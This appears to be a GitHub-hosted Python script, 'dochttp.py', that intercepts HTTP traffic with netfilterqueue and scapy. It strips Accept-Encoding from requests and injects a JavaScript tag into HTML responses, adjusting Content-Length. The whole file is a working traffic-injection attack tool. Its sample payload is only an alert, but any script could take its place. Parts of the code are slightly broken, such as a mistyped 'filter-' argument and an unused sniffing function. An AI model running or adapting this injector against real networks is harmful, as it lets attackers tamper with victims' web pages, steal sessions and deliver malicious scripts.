HTTP-Injector/dochttp.py at main · BLACK-BUG-HKRS/HTTP-Injector · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
from scapy.all import *
from colorama import init, Fore
import netfilterqueue
import re


init()

GREEN = Fore.GREEN
RESET = Fore.RESET


def sniff_packets(iface=None):
    if iface:
        sniff(filter-"port 80", prn=process_packet, iface=iface, store=False)

    else:
        sniff(filter="port 80", prn=process_packet, store=False)


def process_packet(packet):

    spacket = IP(packet.get_payload())
    if spacket[TCP].dport == 80:
        print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")

        try:
            load = spacket[Raw].load.decode()
        except Exception as e:
            packet.accept()
            return

        new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)

        spacket[Raw].load = new_load

        spacket[IP].len = None
        spacket[IP].chksum = None
        spacket[TCP].chksum = None

        packet.set_payload(bytes(spacket))

    if spacket[TCP].sport == 80:
        print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")

        try:
            load = spacket[Raw].load.decode()
        except:
            packet.accept()
            return

        added_text = "<script>alert('Javascript Injected successfully!');</script>"

        added_text_length = len(added_text)

        load = load.replace("</body>", added_text + "</body>")

        if "Content-Length" in load:
            content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))

            new_content_length = content_length + added_text_length

            load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)

            if added_text in load:
                print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")


        spacket[Raw].load = load

        spacket[IP].len = None
        spacket[IP].chksum = None
        spacket[TCP].chksum = None

        packet.set_payload(bytes(spacket))

    packet.accept()

if __name__ == "__main__":

   queue = netfilterqueue.NetfilterQueue()

   queue.bind(0, process_packet)

   queue.run()